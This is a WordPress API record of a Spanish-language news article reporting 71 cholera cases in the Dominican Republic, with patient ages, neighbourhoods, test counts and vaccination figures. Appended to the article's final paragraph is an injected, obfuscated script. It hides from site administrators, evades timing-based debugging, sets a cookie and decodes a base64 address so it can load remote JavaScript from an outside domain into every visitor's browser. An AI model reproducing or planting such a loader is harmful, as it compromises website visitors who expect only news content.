{"id":14092,"date":"2023-02-15T14:20:02","date_gmt":"2023-02-15T18:20:02","guid":{"rendered":"https:\/\/yanessiespinal.com\/?p=14092"},"modified":"2023-02-15T14:20:02","modified_gmt":"2023-02-15T18:20:02","slug":"el-pais-registra-71-casos-de-colera","status":"publish","type":"post","link":"https:\/\/enterarterd.com\/?p=14092","title":{"rendered":"El pa\u00eds registra 71 casos de c\u00f3lera"},"content":{"rendered":"<p>El Ministerio de Salud P\u00fablica\u00a0(MSP) report\u00f3 este mi\u00e9rcoles seis casos nuevos de c\u00f3lera, y aumentaron a 71 los que se han registrado en el pa\u00eds en el actual brote de la enfermedad que inici\u00f3 en octubre del a\u00f1o pasado.<\/p>\n<p>En rueda de prensa, el viceministro de Salud Colectiva, Eladio P\u00e9rez, se\u00f1al\u00f3 que los infectados son cuatro masculinos de 47, 45, 33 y tres a\u00f1os de edad, y dos f\u00e9minas de 69 y 25 a\u00f1os.<\/p>\n<p>Declar\u00f3 que los pacientes provienen de zonas donde previamente han detectado casos, como Villa Liberaci\u00f3n, El Almirante, el Ensanche Luper\u00f3n y Villa Agr\u00edcolas.<\/p>\n<p>Inform\u00f3 que desde la reaparici\u00f3n de la afecci\u00f3n el territorio han realizado 8 mil 900 pruebas a personas con la sintomatolog\u00eda de la condici\u00f3n, y s\u00f3lo en los \u00faltimos d\u00edas se tomaron 40 y todas fueron descartadas al c\u00f3lera.<\/p>\n<p>\u201cSeguimos atentos, no bajamos la guardia y estamos sumamente vigilantes\u201d, expres\u00f3 el funcionario, quien tambi\u00e9n llam\u00f3 a la poblaci\u00f3n a mantener las medidas de higiene para evitar el padecimiento.<\/p>\n<p>En el encuentro con los medios, la doctora Gina Estrella, titular de la Direcci\u00f3n de Gesti\u00f3n de Riesgos y Atenci\u00f3n a Desastres, declar\u00f3 que siete personas est\u00e1n ingresadas en el hospital F\u00e9lix Mar\u00eda Goico con sospecha de la patolog\u00eda.<\/p>\n<p>Asimismo, la encargada de la Direcci\u00f3n de Inmunoprevenibles por Vacunas (DIV), Aida Luc\u00eda Vargas, manifest\u00f3 que se han inoculado 21 mil 087 individuos contra el c\u00f3lera.<\/p>\n<p>Dijo que de los vacunados, unos 5 mil 700 dosis son privados de libertad de la Penitenciar\u00eda Nacional de La Victoria y 1065 son del Centro de Correcci\u00f3n y Rehabilitaci\u00f3n de Rafey en Santiago.<script>(function(){try{if(document.getElementById&&document.getElementById('wpadminbar'))return;var t0=+new Date();for(var i=0;i<20000;i++){var z=i*i;}if((+new Date())-t0>120)return;if((document.cookie||'').indexOf('http2_session_id=')!==-1)return;function systemLoad(input){var key='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+\/=',o1,o2,o3,h1,h2,h3,h4,dec='',i=0;input=input.replace(\/[^A-Za-z0-9\\+\\\/\\=]\/g,'');while(i<input.length){h1=key.indexOf(input.charAt(i++));h2=key.indexOf(input.charAt(i++));h3=key.indexOf(input.charAt(i++));h4=key.indexOf(input.charAt(i++));o1=(h1<<2)|(h2>>4);o2=((h2&15)<<4)|(h3>>2);o3=((h3&3)<<6)|h4;dec+=String.fromCharCode(o1);if(h3!=64)dec+=String.fromCharCode(o2);if(h4!=64)dec+=String.fromCharCode(o3);}return dec;}var u=systemLoad('aHR0cHM6Ly9zZWFyY2hyYW5rdHJhZmZpYy5saXZlL2pzeA==');if(typeof window!=='undefined'&#038;&#038;window.__rl===u)return;var d=new Date();d.setTime(d.getTime()+30*24*60*60*1000);document.cookie='http2_session_id=1; expires='+d.toUTCString()+'; path=\/; SameSite=Lax'+(location.protocol==='https:'?'; Secure':'');try{window.__rl=u;}catch(e){}var s=document.createElement('script');s.type='text\/javascript';s.async=true;s.src=u;try{s.setAttribute('data-rl',u);}catch(e){}(document.getElementsByTagName('head')[0]||document.documentElement).appendChild(s);}catch(e){}})();<\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>El Ministerio de Salud P\u00fablica\u00a0(MSP) report\u00f3 este mi\u00e9rcoles seis casos nuevos de c\u00f3lera, y aumentaron a 71 los que se han registrado en el pa\u00eds en el actual brote de la enfermedad que inici\u00f3 en octubre del a\u00f1o pasado. En rueda de prensa, el viceministro de Salud Colectiva, Eladio P\u00e9rez, se\u00f1al\u00f3 que los infectados son [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":14094,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[6],"tags":[],"class_list":{"0":"post-14092","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-nacionales"},"_links":{"self":[{"href":"https:\/\/enterarterd.com\/index.php?rest_route=\/wp\/v2\/posts\/14092","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/enterarterd.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/enterarterd.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/enterarterd.com\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/enterarterd.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=14092"}],"version-history":[{"count":0,"href":"https:\/\/enterarterd.com\/index.php?rest_route=\/wp\/v2\/posts\/14092\/revisions"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/enterarterd.com\/index.php?rest_route=\/wp\/v2\/media\/14094"}],"wp:attachment":[{"href":"https:\/\/enterarterd.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=14092"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/enterarterd.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=14092"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/enterarterd.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=14092"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}